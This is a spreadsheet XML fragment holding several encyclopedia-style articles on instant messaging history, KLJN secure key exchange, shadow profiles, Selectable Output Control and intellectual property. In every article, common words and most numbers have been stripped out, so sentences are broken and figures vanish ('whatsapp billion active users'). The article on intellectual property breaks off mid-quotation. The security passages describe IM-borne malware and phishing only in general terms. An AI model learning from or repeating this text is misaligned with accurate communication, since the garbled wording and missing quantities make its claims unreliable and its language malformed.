commercial online chat service opposed plato, educational) compuserve simulator 1980, created compuserve executive alexander "sandy" trevor columbus, ohio. networks developed, protocols spread networks. some used peer-to-peer protocol (e.g. talk, ntalk ytalk), others required peers connect server (see talker irc). zephyr notification service (still institutions) invented mit's project athena 1980s allow service providers locate send messages users. early instant messaging programs primarily real-time text, characters appeared typed. this includes unix "talk" command line program, popular 1980s early 1990s. some chat programs (i.e. celerity bbs) also used similar interface. modern implementations real-time text also exist instant messengers, aol's real-time optional feature. latter half 1980s early 1990s, quantum link online service commodore computers offered user-to-user messages concurrently connected customers, called "on-line messages" short), later "flashmail." quantum link later became america online made instant messenger (aim, discussed later). while quantum link client software commodore using commodore's petscii text-graphics, screen visually divided sections olms would appear yellow saying "message from:" name sender along message across whatever user already doing, presented list options responding. such, could considered type graphical user interface (gui), albeit much primitive later unix, windows macintosh based software. olms q-link called "plus services" meaning charged extra per-minute monthly q-link access costs. modern, internet-wide, gui-based messaging clients known today, began take mid-1990s powwow, icq, instant messenger. similar functionality offered cu-seeme 1992; though primarily audio/video chat link, users could also send textual messages other. later acquired mirabilis, authors icq; establishing dominance instant messaging market. years later (then owned aol) awarded patents instant messaging u.s. patent office. meanwhile, companies developed software; (excite, msn, ubique, yahoo!), proprietary protocol client; users therefore multiple client applications wished networks. 1998, released lotus sametime, product based technology acquired bought haifa-based ubique lexington-based databeam. 2000, open-source application open standards-based protocol called jabber launched. protocol standardized name extensible messaging presence protocol (xmpp). xmpp servers could gateways protocols, reducing need multiple clients. multi-protocol clients popular protocols using additional local libraries protocol. lotus sametime's november 2007 release added lotus sametime gateway support xmpp. video calling using webcam also started taking time. microsoft netmeeting earliest, skype released 2003 first focused features brought wider audience.by 2006, controlled percent instant messaging market, rapidly declined shortly thereafter company struggled compete services. 2010, instant messaging sharp decline favor messaging features social networks. social networking providers often offer abilities, example facebook chat, twitter thought instant messaging system. similar server-side chat features part dating websites, okcupid plentyoffish. former popular platforms terminated later years, aim.the popularity instant messaging soon revived services form mobile applications, notable examples time blackberry messenger (first released 2005; today available blackberry messenger enterprise) whatsapp (first released 2009). unlike previous applications, newer ones usually mobile devices coincided rising popularity internet-enabled smartphones; surpassing message volume 2013. 2014, users social networks. january 2015, service whatsapp alone accommodated billion messages daily comparison billion sms.in 2016, google introduced intelligent messaging incorporated machine learning technology called allo. google allo shut march 2019. interoperability standard complementary instant messaging applications offer functions like file transfer, contact list(s), ability hold several simultaneous conversations, etc. these functions small business needs, larger organizations require sophisticated applications work together. solution finding applications capable enterprise versions instant messaging applications. these include titles like xmpp, lotus sametime, microsoft office communicator, etc., often integrated enterprise applications workflow systems. these enterprise applications, enterprise application integration (eai), built certain constraints, namely storing data common format. there several attempts create unified standard instant messaging: ietf's session initiation protocol (sip) instant messaging presence leveraging extensions (simple), application exchange (apex), instant messaging presence protocol (impp), open xml-based extensible messaging presence protocol (xmpp), open mobile alliance's instant messaging presence service developed specifically mobile devices. most attempts producing unified standard major providers (aol, yahoo! microsoft) failed, continues proprietary protocol. however, discussions ietf stalled, reuters signed first inter-service provider connectivity agreement september 2003. this agreement enabled aim, messenger users talk reuters messaging counterparts vice versa. following this, microsoft, yahoo! agreed deal microsoft's live communications server 2005 users would also possibility talk public instant messaging users. this deal established sip/simple standard protocol interoperability established connectivity accessing public instant messaging groups services. separately, october 2005, microsoft yahoo! announced quarter 2006 would interoperate using sip/simple, followed, december 2005, google strategic partnership deal google talk users would able communicate users provided account. there ways combine many disparate protocols: combine many disparate protocols inside client application. combine many disparate protocols inside server application. this approach moves task communicating services server. clients need know care protocols. example, 2005 public connectivity. this approach popular xmpp servers; however, so-called transport projects suffer reverse engineering difficulties project involved closed protocols formats.some approaches allow organizations deploy own, private instant messaging network enabling restrict access server (often network entirely behind firewall) administer user permissions. other corporate messaging systems allow registered users also connect outside corporation lan, using encrypted, firewall-friendly, https-based protocol. usually, dedicated corporate server several advantages, pre-populated contact lists, integrated authentication, better security privacy. certain networks made changes prevent used multi-network clients. example, trillian release several revisions patches allow users access msn, aol, yahoo! networks, changes made networks. major providers usually cite need formal agreements, security concerns reasons making changes. proprietary protocols meant many instant messaging networks incompatible users unable reach users networks. this allowed social networking im-like features text messaging opportunity gain market share expense effects communication messaging applications affected people communicate devices. survey conducted metrixlabs showed messaging applications baby boomers, generation generation said used messaging applications place texting. facebook survey showed people surveyed thought messaging applications made group messaging easier. effects workplace communication messaging applications also changed people communicate workplace. enterprise messaging applications like slack, telemessage, teamnote yammer allow companies enforce policies employees message work ensure secure storage sensitive data. message applications allow employees separate work information personal emails texts. messaging applications make workplace communication efficient, also consequences productivity. study slack showed average, people spend hours slack, time spend using email. language users sometimes make internet slang text speak abbreviate common words expressions quicken conversations reduce keystrokes. language become widespread, well-known expressions 'lol' translated face-to-face language. emotions often expressed shorthand, abbreviation lol, ttyl; respectively laugh(ing) loud, right back, talk later. some, however, attempt accurate emotional expression real time reactions (chortle) (snort) (guffaw) (eye-roll) becoming popular. also certain standards introduced mainstream conversations including, indicates sarcasm statement indicates spelling mistake and/or grammatical error prior message, followed correction. business application instant messaging proven similar personal computers, email, world wide web, adoption business communications medium driven primarily individual employees using consumer software work, rather formal mandate provisioning corporate information technology departments. tens millions consumer accounts used business purposes employees companies organizations. response demand business-grade need ensure security legal compliance, type instant messaging, called "enterprise instant messaging" ("eim") created lotus software launched lotus sametime 1998. microsoft followed suit shortly thereafter microsoft exchange instant messaging, later created platform called microsoft office live communications server, released office communications server 2007 october 2007. oracle corporation also jumped market oracle beehive unified collaboration software. both lotus microsoft introduced federation systems public networks employees interface internal system contacts aol, msn, yahoo. 2010, leading platforms include lotus sametime, microsoft office communications server, jabber cisco unified presence. industry-focused platforms reuters messaging bloomberg messaging also provide abilities financial services companies.the adoption across corporate networks outside control organizations creates risks liabilities companies effectively manage support use. companies implement specialized archiving security products services mitigate risks provide safe, secure, productive instant messaging abilities employees. increasingly becoming feature enterprise software rather stand-alone application. products usually categorised types: enterprise instant messaging (eim) consumer instant messaging (cim). enterprise solutions internal server, however always feasible, particularly smaller businesses limited budgets. second option, using provides advantage inexpensive implement little need investing hardware server software. corporate use, encryption conversation archiving usually regarded important features security concerns. there also bunch open source encrypting messengers. sometimes different operating systems organizations requires software supports platform. example, many software companies windows administration departments software developers linux. comparison acronym “short message service” allows mobile phone users send text messages without internet connection, instant messaging provides similar services internet connection. much dominant form communication before, smartphones became widely used globally. while relied traditional paid telephone services, instant messaging apps mobiles available free minor data charge. 2012 volume peaked, 2013 chat apps surpassed global message volume.easier group messaging another advantage smartphone messaging apps also contributed adoption. before introduction messaging apps, smartphone users could participate single-person interactions mobile voice calls sms. with introduction messaging apps, group chat functionality allows members entire thread everyone's responses. members also respond directly other, rather member started group message, relay information.however, still remains popular united states usually included free monthly phone bundles. while volumes countries like denmark, spain singapore dropped two-thirds 2011 2013, united states dropped quarter. security archiving crackers (malicious black hackers) consistently used networks vectors delivering phishing attempts, drive-by urls, virus-laden file attachments 2004 present, 1100 discrete attacks listed security center 2004–2007. hackers methods delivering malicious code delivery viruses, trojan horses, spyware within infected file, "socially engineered" text address entices recipient click connecting website downloads malicious code. viruses, computer worms, trojans usually propagate sending rapidly infected user's contact list. effective attack using poisoned reach tens thousands users short period user's contact list receives messages appearing trusted friend. recipients click address, entire cycle starts again. infections range nuisance criminal, becoming sophisticated year. connections sometimes occur plain text, making vulnerable eavesdropping. also, client software often requires user expose open ports world, raising threat posed potential security vulnerabilities.in early 2000s, class security provider emerged provide remedies risks liabilities faced corporations chose business communications. security providers created products installed corporate networks purpose archiving, content-scanning, security-scanning traffic moving corporation. similar e-mail filtering vendors, security providers focus risks liabilities described above. with rapid adoption workplace, demand security products began grow mid-2000s. 2007, preferred platform purchase security software become "computer appliance", according idc, estimated 2008, network security products would delivered appliance.by 2014 however, level safety offered instant messengers still extremely poor. according scorecard made electronic frontier foundation, instant messengers received perfect score, whereas popular instant messengers time attained score number studies shown services quite vulnerable providing user privacy. encryption encryption primary method messaging apps protect user's data privacy security. messages encrypted, making insecure, content message visible mobile carriers governments intercepted third party. messages also leak metadata, information message message content itself, phone numbers sender recipient, identify people involved conversation. messages also spoofed sender message edited impersonate another person.messaging applications market end-to-end encryption include signal, whatsapp, wire imessage. applications criticized lacking poor encryption methods include telegram confide, prone error. compliance risks addition malicious code threat, instant messaging work also creates risk non-compliance laws regulations governing electronic communications businesses. united states alone 10,000 laws regulations related electronic messaging records retention. better-known include sarbanes–oxley act, hipaa, 17a-3. clarification financial industry regulatory authority (finra) issued member firms financial services industry december, 2007, noting "electronic communications", "email", "electronic correspondence" used interchangeably include forms electronic messaging instant messaging text messaging. changes federal rules civil procedure, effective december 2006, created category electronic records requested discovery legal proceedings. most nations also regulate electronic messaging electronic records retention similar fashion united states. common regulations related work involve need produce archived business communications satisfy government judicial requests law. many instant messaging communications fall category business communications must archived retrievable. user base october 2019, used messaging apps worldwide whatsapp billion active users, facebook messenger billion users, wechat billion. there countries world whatsapp market leader messaging apps countries leading messenger owned facebook. more million users other platforms closed services unclear activity also terms ambient awareness communications protocol mass collaboration message-oriented middleware operator messaging social media text messaging unified communications messaginglists comparison instant messaging clients comparison instant messaging protocols comparison user features messaging platformsother code shikara (computer worm) references external links instant messaging curlie</t>
  </si>
  <si>
    <t>KLJN Secure Key Exchange</t>
  </si>
  <si>
    <t>random-resistor-random-temperature kirchhoff-law-johnson-noise exchange, also known rrrt-kljn simply kljn, approach distributing cryptographic keys parties claims offer unconditional security. this claim, contested, significant, exchange approach claiming offer unconditional security quantum distribution. kljn secure exchange scheme proposed 2005 laszlo kish granqvist. advantage quantum distribution performed metallic wire four resistors, noise generators, four voltage measuring devices---equipment low-priced readily manufactured. disadvantage several attacks kljn identified must defended against. "given amount effort funding goes quantum cryptography substantial (some even mock distraction ultimate prize quantum computing), seems fact classic thermodynamic resources allow similar inherent security give pause," wrote henning dekant, founder quantum computing meetup, april 2013. cybersecurity curricula 2017, joint project association computing machinery, ieee computer society, association information systems, international federation information processing technical committee information security education (ifip 11.8) recommends teaching kljn scheme part teaching "advanced concepts" knowledge unit cryptography. also/further reading references</t>
  </si>
  <si>
    <t>Shadow profile</t>
  </si>
  <si>
    <t>shadow profile describes situation users' non-users' information collected without consent. discussed case shadow profiling facebook, reported collect information people provide. shadow profile's history early 2012, data breach million facebook users' personal information indicated existence shadow profiles, since leaked information provided users themselves. after this, facebook started combine user's shadow profiles public profiles. combined profiles shared users' friends used facebook's download your information (dyi) tool. shadow profile's influence positive influences influences brought shadow profile perceived two-sided perspective: positive negative. benefits brought shadow profile related behaviors include efficient data collection anomaly behaviors detection. some researches show integrated conceptualizations internet privacy concerns (ipc) several implications: third-order factor differentiate relation constructions allows website users managers analyze importance various privacy contexts. negative influences possible harms users privacy information leakage include collection sensitive data like financial account numbers, health information precise geolocation. 21st century, workplace quintessential social establishments employees perform given defined condition starts emerge blurred line workspace personal space. even people knowingly share thoughts online comments likes, traces affect real live events recruiting decisions surveillance conducted employers. possible privacy issue factors some argue users aware possible privacy invasion, potential benefits risks utilizing social media. however, researches show users upload large amount personal information online space. some researchers describe phenomenon users' attitude, possible explanations behaviors combination high gratification, usage patterns, psychological mechanism similar third-person effect. users sometimes found reason information leakage. generate customized results, sometimes users willing share information internet things (iots) convenience. other circumstances users would share information feel anxious, concerned, able protect privacy invasion, likely conduct privacy protection behavior. words, users feel control privacy invasion, less likely protect information.there also researchers argue correlation information leakage companies' cooperation third-parties. online platforms would need find balance monetization third-parties managing users' private information, study shows higher privacy concerns users would drive publisher websites’ decision making third party market structures, higher privacy concerns lead higher industry concentration. even more, different situations environmental factors conducting online behaviors highly likely influence people's behaviors, lead rational/irrational decision makings.in terms protection officials, drawing reference case article european convention human rights, researchers conclude current cannot adequately address issue privacy provide protection open source. possible privacy issue solutions address issue leaking personal information exist multiple facets. category solution suggests focus users. argued solutions points inefficiency privacy terms companies users' consent, sometimes lengthy (facebook's privacy terms 9,500 words), involved professional vocabularies would fully understand users understand parties granting information result, solutions advance privacy terms making easy read understand. addition, conversation among users another factor leads information leakage people share information become incapable controlling spread information afterwards. thus argue instead focusing companies provide clearer picture possible information access, users primary target controlling personal information online would work efficient ease companies' consumers' concerns data collection. another proposed argument also emphasizes focus users, claims making users fully aware online logistics behind online behaviors, trust virtual world would take care personal information even more.instead merely focusing users, suggest interdependent relationship users online platforms companies, social contract them: companies collect personal data feedback users, users would benefited modified functional improvements. result, companies merely side notifying users privacy norms contractor responsible maintaining mutually beneficial relationship users, privacy tension eased. also internet privacy communication privacy management theory participatory surveillance references</t>
  </si>
  <si>
    <t>Selectable Output Control</t>
  </si>
  <si>
    <t>selectable output control (soc) content protection digital rights management (drm) technology incorporated approved devices enables multichannel video programming distributor (mvpd, cable company) disable non-secure audio-video output encoding video specific signal. practice, aims limit output high definition video non-secure analog outputs component video connections. when enabled, output high definition content high-definition multimedia interface (hdmi) devices high-bandwidth digital content protection (hdcp) approved. this means enabled program, older televisions hdmi port hdcp compliant able view content. u.s. federal communications commission (fcc) has, recently, soc. 2010 granted limited waiver section 76.1903 allow soc. this waiver filed motion picture association america (mpaa) allow broadcast first movies shortly theatrical release, prior home video release. mpaa argued member companies (the studios) would agree releasing movies on-demand market without ability enforce copy protection, analog outputs component video connections lack. concern unprotected analog output open piracy. agreed would public interest allow since would allow americans difficulty getting movies opportunity enjoy first movies home. cites example using homebound parents young children hard time getting movies able find babysitter. american association people disabilities also favor mpaa's plan offer high-definition first movies home video release would increase entertainment options disabled americans home. waiver granted limited enable actions requested mpaa waiver application, citing request broad undefined. according waiver soc, following limitations would placed granted waiver. there would activation window limitation. used days first implemented, movie available pre-recorded media (dvd, blu-ray disc), whichever comes first. that way, according fcc, owners legacy hdtvs (those without hdmi connections hdcp certification) lose access content previously access fcc's 90-day limitation window effort limit potential mpaa circumvent rule releasing content pre-recorded media. example, world moves toward video-on-demand, physical media could become obsolete. case, movie never released "pre-recorded" media. after days, would banned use. waiver reviewed years. review waiver years time assess whether adverse effects public interest. however, leaves companies file report. this report contain summary consumer complaints regard soc, average price charged first programming activated, average price charged video-on-demand without activated, detailed office results prior offering program on-demand activated, whether effective combating piracy use. this certainly requirement vague details. however, ineffective combating piracy little incentive using fact, possible mpaa member studios could decide continued practice releasing first movies video-on-demand market. approved output devices hdmi, digital outputs cablelabs approved unidirectional digital cable products, mvpd-approved protected output internet protocol television (iptv) satellite broadcasters. intent discourage development proprietary output connections either mpaa mvpd could hamper competition third party devices using standard and/or accepted means copy protected output. closed captioning video description provided already requirement video-on-demand services must offered closed captions. included consumer protection limit promise cancel waiver mvpd implement manner accordance waiver requirements. waiver limited mpaa mvpds. according waiver "any similarly situated provider firstrun theatrical content (“similarly situated provider”) mvpd partners take advantage instant waiver filing election participate (“election’) proceeding." also copy control information references external links http://hraunfoss.fcc.gov/edocs_public/attachmatch/da-10-795a1.pdf</t>
  </si>
  <si>
    <t>Intellectual property</t>
  </si>
  <si>
    <t>intellectual property (ip) category property includes intangible creations human intellect. there many types intellectual property, countries recognize others. best-known types copyrights, patents, trademarks, trade secrets. modern concept intellectual property developed england 17th 18th centuries. term "intellectual property" began used 19th century, though late 20th century intellectual property became commonplace majority world's legal systems.the main purpose intellectual property encourage creation wide variety intellectual goods. achieve this, gives people businesses property rights information intellectual goods create, usually limited period time. this gives economic incentive creation, allows people benefit information intellectual goods create, allows protect ideas prevent copying. these economic incentives expected stimulate innovation contribute technological progress countries, depends extent protection granted innovators.the intangible nature intellectual property presents difficulties compared traditional property like land goods. unlike traditional property, intellectual property "indivisible", since unlimited number people "consume" intellectual good without depleted. additionally, investments intellectual goods suffer problems appropriation: landowners surround land robust fence hire armed guards protect producers information literature usually little stop first buyer replicating selling lower price. balancing rights strong enough encourage creation intellectual goods strong prevent goods' wide primary focus modern intellectual property law. history statute monopolies (1624) british statute anne (1710) seen origins patent copyright respectively, firmly establishing concept intellectual property. "literary property" term predominantly used british legal debates 1760s 1770s extent authors publishers works also rights deriving common property (millar taylor (1769), hinton donaldson (1773), donaldson becket (1774)). first known term intellectual property dates time, piece published monthly review 1769 used phrase. first clear example modern usage goes back early 1808, used heading title collection essays.the german equivalent used founding north german confederation whose constitution granted legislative power protection intellectual property (schutz geistigen eigentums) confederation. when administrative secretariats established paris convention (1883) berne convention (1886) merged 1893, located berne, also adopted term intellectual property combined title, united international bureaux protection intellectual property. organization subsequently relocated geneva 1960 succeeded 1967 establishment world intellectual property organization (wipo) treaty agency united nations. according legal scholar mark lemley, point term really began used united states (which party berne convention), enter popular usage passage bayh-dole 1980. history patents begin inventions, rather royal grants queen elizabeth (1558–1603) monopoly privileges. approximately years elizabeth's reign, however, patent represents legal right obtained inventor providing exclusive control production sale mechanical scientific invention. demonstrating evolution patents royal prerogative common-law doctrine. term found used october 1845 massachusetts circuit court ruling patent case davoll brown, justice charles woodbury wrote "only protect intellectual property, labors mind, productions interests much man's wheat cultivates, flocks rears." statement "discoveries property" goes back earlier. section french 1791 stated, "all discoveries property author; assure inventor property temporary enjoyment discovery, shall delivered patent five, fifteen years." europe, french author nion mentioned propriété intellectuelle droits civils auteurs, artistes inventeurs, published 1846. until recently, purpose intellectual property give little protection possible order encourage innovation. historically, therefore, legal protection granted necessary encourage invention, limited time scope. this mainly result knowledge traditionally viewed public good, order allow extensive dissemination improvement.the concept's origin potentially traced back further. jewish includes several considerations whose effects similar modern intellectual property laws, though notion intellectual creations property seem exist notably principle hasagat ge'vul (unfair encroachment) used justify limited-term publisher (but author) copyright 16th century. bce, government greek state sybaris offered year's patent discover refinement luxury".according jean-frédéric morin, "the global intellectual property regime currently midst paradigm shift". indeed, early 2000s global regime used dominated high standards protection characteristic laws europe united states, vision uniform application standards every country several fields little consideration social, cultural environmental values national level economic development. morin argues "the emerging discourse global regime advocates greater policy flexibility greater access knowledge, especially developing countries." indeed, development agenda adopted wipo 2007, recommendations adjust wipo's activities specific needs developing countries reduce distortions especially issues patients’ access medicines, internet users’ access information, farmers’ access seeds, programmers’ access source codes students’ access scientific articles. however, paradigm shift manifested concrete legal reforms international level.similarly, based background trade-related aspects intellectual property rights (trips) agreement requires members minimum standards legal protection, objective “one-fits-all” protection intellectual property viewed controversies regarding differences development level countries. despite controversy, agreement extensively incorporated intellectual property rights global trading system first time 1995, prevailed comprehensive agreement reached world. rights intellectual property rights include patents, copyright, industrial design rights, trademarks, plant variety rights, trade dress, geographical indications, jurisdictions trade secrets. there also specialized derived varieties generis exclusive rights, circuit design rights (called mask work rights us), supplementary protection certificates pharmaceutical products (after expiry patent protecting them), database rights european law). term "industrial property" sometimes used refer large subset intellectual property rights including patents, trademarks, industrial designs, utility models, service marks, trade names, geographical indications. patents patent form right granted government inventor successor-in-title, giving owner right exclude others making, using, selling, offering sell, importing invention limited period time, exchange public disclosure invention. invention solution specific technological problem, product process generally fulfill three main requirements: new, obvious needs industrial applicability.: enrich body knowledge stimulate innovation, obligation patent owners disclose valuable information inventions public. copyright copyright gives creator original work exclusive rights usually limited time. copyright apply wide range creative, intellectual, artistic forms, "works". copyright cover ideas information themselves, form manner expressed. industrial design rights industrial design right (sometimes called "design right" design patent) protects visual design objects purely utilitarian. industrial design consists creation shape, configuration composition pattern color, combination pattern color three-dimensional form containing aesthetic value. industrial design two- three-dimensional pattern used produce product, industrial commodity handicraft. generally speaking, makes product look appealing, such, increases commercial value goods. plant varieties plant breeders' rights plant variety rights rights commercially variety plant. variety must amongst others novel distinct registration evaluation propagating material variety considered. trademarks trademark recognizable sign, design expression distinguishes products services particular trader similar products services traders. trade dress trade dress legal term generally refers characteristics visual aesthetic appearance product packaging even design building) signify source product consumers. trade secrets trade secret formula, practice, process, design, instrument, pattern, compilation information generally known reasonably ascertainable, business obtain economic advantage competitors customers. there formal government protection granted; business must take measures guard trade secrets (e.g., formula soft drinks trade secret coca-cola.) motivation justification main purpose intellectual property encourage creation wide variety intellectual goods consumers. achieve this, gives people businesses property rights information intellectual goods create, usually limited period time. because profit them, gives economic incentive creation. intangible nature intellectual property presents difficulties compared traditional property like land goods. unlike traditional property, intellectual property indivisible unlimited number people "consume" intellectual good without depleted. additionally, investments intellectual goods suffer problems appropriation landowner surround land robust fence hire armed guards protect producer information intellectual good usually little stop first buyer replicating selling lower price. balancing rights strong enough encourage creation information intellectual goods strong prevent wide primary focus modern intellectual property law.by exchanging limited exclusive rights disclosure inventions creative works, society patentee/copyright owner mutually benefit, incentive created inventors authors create disclose work. some commentators noted objective intellectual property legislators support implementation appears "absolute protection". intellectual property desirable encourages innovation, reason, better. thinking creators sufficient incentive invent unless legally entitled capture full social value inventions". this absolute protection full value view treats intellectual property another type "real" property, typically adopting rhetoric. other recent developments intellectual property law, america invents act, stress international harmonization. recently also much debate desirability using intellectual property rights protect cultural heritage, including intangible ones, well risks commodification derived possibility. issue still remains open legal scholarship. financial incentive these exclusive rights allow owners intellectual property benefit property created, providing financial incentive creation investment intellectual property, and, case patents, associated research development costs. united states article section clause constitution, commonly called patent copyright clause, reads; "the congress shall power promote progress science useful arts, securing limited times authors inventors exclusive right respective writings discoveries.'" ”some commentators, david levine michele boldrin, dispute justification.in 2013 united states patent trademark office approximated worth intellectual property u.s. economy trillion creates employment estimated million american people. value intellectual property considered similarly high developed nations, european union. become recognised asset class pension-led funding types business finance. however, 2013, intellectual property office stated: "there millions intangible business assets whose value either leveraged all, leveraged inadvertently". economic growth wipo treaty several related international agreements underline protection intellectual property rights essential maintaining economic growth. wipo intellectual property handbook gives reasons intellectual property laws: give statutory expression moral economic rights creators creations rights public access creations. second promote, deliberate government policy, creativity dissemination application results encourage fair trading would contribute economic social development. anti-counterfeiting trade agreement (acta) states "effective enforcement intellectual property rights critical sustaining economic growth across industries globally".economists estimate two-thirds value large businesses united states traced intangible assets. "ip-intensive industries" estimated generate value added (price minus material cost) employee "non-ip-intensive industries".a joint research project wipo united nations university measuring impact systems asian countries found positive correlation strengthening system subsequent economic growth." morality according article universal declaration human rights, "everyone right protection moral material interests resulting scientific, literary artistic production author". although relationship intellectual property human rights complex one, moral arguments intellectual property. arguments justify intellectual property fall three major categories. personality theorists believe intellectual property extension individual. utilitarians believe intellectual property stimulates social progress pushes people innovation. lockeans argue intellectual property justified based deservedness hard work.various moral justifications private property used argue favor morality intellectual property, natural rights/justice argument: argument based locke's idea person natural right labour products produced body. appropriating products viewed unjust. although locke never explicitly stated natural right applied products mind, possible apply argument intellectual property rights, would unjust people misuse another's ideas. locke's argument intellectual property based upon idea laborers right control create. they argue bodies laborers, right ownership extends create. thus, intellectual property ensures right comes production. utilitarian-pragmatic argument: according rationale, society protects private property effective prosperous societies not. innovation invention 19th century america attributed development patent system. providing innovators "durable tangible return investment time, labor, resources", intellectual property rights seek maximize social utility. presumption promote public welfare encouraging "creation, production, distribution intellectual works". utilitarians argue without intellectual property would lack incentive produce ideas. systems protection intellectual property optimize social utility. "personality" argument: argument based quote hegel: "every right turn upon thing make thing object will, say, aside mere thing recreate own". european intellectual property shaped notion ideas "extension oneself one's personality". personality theorists argue creator something inherently risk vulnerable ideas designs stolen and/or altered. intellectual property protects moral claims personality.lysander spooner (1855) argues "that natural absolute right—and natural absolute, necessarily perpetual, right—of property, ideas, discoverer creator; right property, ideas, intrinsically stands identically grounds with, right property material things; distinction, principle, exists cases".writer rand argued book capitalism: unknown ideal protection intellectual property essentially moral issue. belief human mind source wealth survival property base intellectual property. violate intellectual property therefore different morally violating property rights compromises processes survival therefore constitutes immoral act. infringement, misappropriation, enforcement violation intellectual property rights, called "infringement" respect patents, copyright, trademarks, "misappropriation" respect trade secrets, breach civil criminal law, depending type intellectual property involved, jurisdiction, nature action. 2011 trade counterfeit copyrighted trademarked works $600 billion industry worldwide accounted 5–7% global trade. patent infringement patent infringement typically caused using selling patented invention without permission patent holder, i.e. patent owner. scope patented invention extent protection defined claims granted patent. there safe harbor many jurisdictions patented invention research. this safe harbor exist unless research done purely philosophical purposes, order gather data order prepare application regulatory approval drug. general, patent infringement cases handled civil (e.g., united states) several jurisdictions incorporate infringement criminal also (for example, argentina, china, france, japan, russia, south korea). copyright infringement copyright infringement reproducing, distributing, displaying performing work, make derivative works, without permission copyright holder, typically publisher business representing assigned work's creator. often called "piracy". while copyright created instant work fixed, generally copyright holder money damages owner registers copyright. enforcement copyright generally responsibility copyright holder. acta trade agreement, signed 2011 united states, japan, switzerland, entered force, requires parties criminal penalties, including incarceration fines, copyright trademark infringement, obligated parties actively police infringement. there limitations exceptions copyright, allowing limited copyrighted works, constitute infringement. examples doctrines fair fair dealing doctrine. trademark infringement trademark infringement occurs party uses trademark identical confusingly similar trademark owned another party, relation products services identical similar products services party. many countries, trademark receives protection without registration, registering trademark provides legal advantages enforcement. infringement addressed civil litigation and, several jurisdictions, criminal law. trade secret misappropriation trade secret misappropriation different violations intellectual property laws, since definition trade secrets secret, patents registered copyrights trademarks publicly available. united states, trade secrets protected state law, states nearly universally adopted uniform trade secrets act. united states also federal form economic espionage 1996 u.s.c. 1831–1839), makes theft misappropriation trade secret federal crime. this contains provisions criminalizing sorts activity. first, u.s.c. 1831(a), criminalizes theft trade secrets benefit foreign powers. second, u.s.c. 1832, criminalizes theft commercial economic purposes. (the statutory penalties different offenses.) commonwealth common jurisdictions, confidentiality trade secrets regarded equitable right rather property right penalties theft roughly united states. criticisms term "intellectual property" criticism term intellectual property ranges discussing vagueness abstract overreach direct contention semantic validity using words like property rights fashions contradict practice law. many detractors think term specially serves doctrinal agenda parties opposing reform public interest otherwise abusing related legislations, disallows intelligent discussion specific often unrelated aspects copyright, patents, trademarks, etc.free software foundation founder richard stallman argues that, although term intellectual property wide use, rejected altogether, "systematically distorts confuses issues, promoted gain confusion". claims term "operates catch-all lump together disparate laws [which] originated separately, evolved differently, cover different activities, different rules, raise different public policy issues" creates "bias" confusing monopolies ownership limited physical things, likening "property rights". stallman advocates referring copyrights, patents trademarks singular warns abstracting disparate laws collective term. argues avoid spreading unnecessary bias confusion, best adopt firm policy speak even think terms 'intellectual property'."similarly, economists boldrin levine prefer term "intellectual monopoly" appropriate clear definition concept, which, argue, dissimilar property rights. they argued "stronger patents little nothing encourage innovation", mainly explained tendency create market monopolies, thereby restricting innovations technology transfer.on assumption intellectual property rights actual rights, stallman says claim live historical intentions behind laws, case copyright served censorship system, later regulatory model printing press benefited authors incidentally, never interfered freedom average readers. still referring copyright, cites legal literature united states constitution case demonstrate meant optional experimental bargain temporarily trade property rights free speech public, private, benefits form increased artistic production knowledge. mentions copyright natural right nothing could justify terminating right certain period time".law professor, writer political activist lawrence lessig, along many copyleft free software activists, criticized implied analogy physical property (like land automobile). they argue analogy fails physical property generally rivalrous intellectual works non-rivalrous (that makes copy work, enjoyment copy prevent enjoyment original). other arguments along lines claim unlike situation tangible property, natural scarcity particular idea information: exists all, re-used duplicated indefinitely without re-use diminishing original. stephan kinsella objected intellectual property grounds word "property" implies scarcity, applicable ideas.entrepreneur politician rickard falkvinge hacker alexandre oliva independently compared george orwell's fictional dialect newspeak terminology used intellectual property supporters linguistic weapon shape public opinion regarding copyright debate drm. alternative terms civil jurisdictions, intellectual property often referred intellectual rights, traditionally somewhat broader concept included moral rights personal protections cannot bought sold. term intellectual rights declined since early 1980s, term intellectual property increased. alternative terms monopolies information intellectual monopoly emerged among argue "property" "intellect" "rights" assumptions, notably richard stallman. backronyms intellectual protectionism intellectual poverty, whose initials also found supporters well, especially among used backronym digital restrictions management.the argument intellectual property right interests better balancing relevant private public interests) termed intellectual monopoly privilege (imp) advanced several academics including birgitte andersen thomas alured faunce. objections overly broad intellectual property laws some critics intellectual property, free culture movement, point intellectual monopolies harming health case pharmaceutical patents), preventing progress, benefiting concentrated interests detriment masses, argue public interest harmed ever-expansive monopolies form copyright extensions, software patents, business method patents. more recently scientists engineers expressing concern patent thickets undermining technological development even high-tech fields like nanotechnology.petra moser asserted historical analysis suggests intellectual property laws harm innovation: overall, weight existing historical evidence suggests patent policies, grant strong intellectual property rights early generations inventors, discourage innovation. contrary, policies encourage diffusion ideas modify patent laws facilitate entry encourage competition effective mechanism encourage innovation. support argument, jörg baten, nicola bianchi petra moser find historical evidence especially compulsory licensing allows governments license patents without consent patent-owners encouraged invention germany early 20th century increasing threat competition fields pre-existing levels competition. peter drahos notes, "property rights confer authority resources. when authority granted resources many depend, gain power goals many. this consequences political economic freedom within society.": world intellectual property organization (wipo) recognizes conflicts exist respect implementation current intellectual property systems human rights. 2001 committee economic, social cultural rights issued document called "human rights intellectual property" argued intellectual property tends governed economic goals viewed primarily social product; order serve human well-being, intellectual property systems must respect conform human rights laws. according committee, systems fail risk infringing upon human right food health, cultural participation scientific benefits. 2004 general assembly wipo adopted geneva declaration future world intellectual property organization argues wipo "focus needs developing countries, view many tools development—not itself".ethical problems pertinent socially valuable goods like life-saving medicines given protection. while application rights allow companies charge higher marginal cost production order recoup costs research development, price exclude market anyone cannot afford cost product, case life-saving drug. driven regime therefore regime conductive investment products socially valuable predominately poor populations".: 1108–9 libertarians differing views intellectual property. stephan kinsella, anarcho-capitalist right-wing libertarianism, argues intellectual property allowing property rights ideas information creates artificial scarcity infringes right tangible property. kinsella uses following scenario argue point: [i]magine time lived caves. bright guy—let's call galt-magnon—decides build cabin open field, near crops. sure, good idea, others notice they naturally imitate galt-magnon, start building cabins. first invent house, according advocates, would right prevent others building houses land, logs, charge build houses. plain innovator examples becomes partial owner tangible property (e.g., land logs) others, first occupation property (for already owned), coming idea. clearly, rule flies face first-user homesteading rule, arbitrarily groundlessly overriding homesteading rule foundation property rights. thomas jefferson said letter isaac mcpherson august 1813: nature made thing less susceptible others exclusive property, action thinking power called idea, individual exclusively possess long keeps himself; moment divulged, forces possession every one, receiver cannot dispossess peculiar character, too, possesses less, every possesses whole receives idea receives instruction without lessening mine; 